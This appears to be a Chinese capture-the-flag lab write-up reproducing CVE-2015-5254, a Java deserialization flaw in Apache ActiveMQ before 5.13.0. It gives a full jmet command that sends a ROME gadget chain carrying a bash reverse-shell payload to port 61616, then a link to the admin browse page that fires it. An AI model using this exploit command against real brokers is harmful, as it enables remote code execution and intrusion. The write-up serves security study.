CVE-2015-5254
漏洞描述:Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
影响版本:Apache ActiveMQ 5.13.0之前5.x版本中
参考资料:
- https://blog.csdn.net/leesir98/article/details/111918336
- https://blog.csdn.net/qq_49780354/article/details/123270945
漏洞复现
- 启动环境会监听两个端口
![图片[1]-【初级】activemq 命令执行-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd133049.png)
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “bash -c {echo,base64加密的反弹shell payload}|{base64,-d}|{bash,-i}” -Yp ROME sm.info-plus.cn 61616
- 借助一个工具
![图片[2]-【初级】activemq 命令执行-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd133130-1024x358.png)
- 执行完之后,进到web管理界面,就是30510端口
http://123.58.224.8:30510/admin/browse.jsp?JMSDestination=event
![图片[3]-【初级】activemq 命令执行-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd133142-1024x213.png)
- 点击之后,自动执行命令
- 获取flag
![图片[4]-【初级】activemq 命令执行-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd133156.png)
![图片[5]-【初级】activemq 命令执行-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd133202-1024x58.png)
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容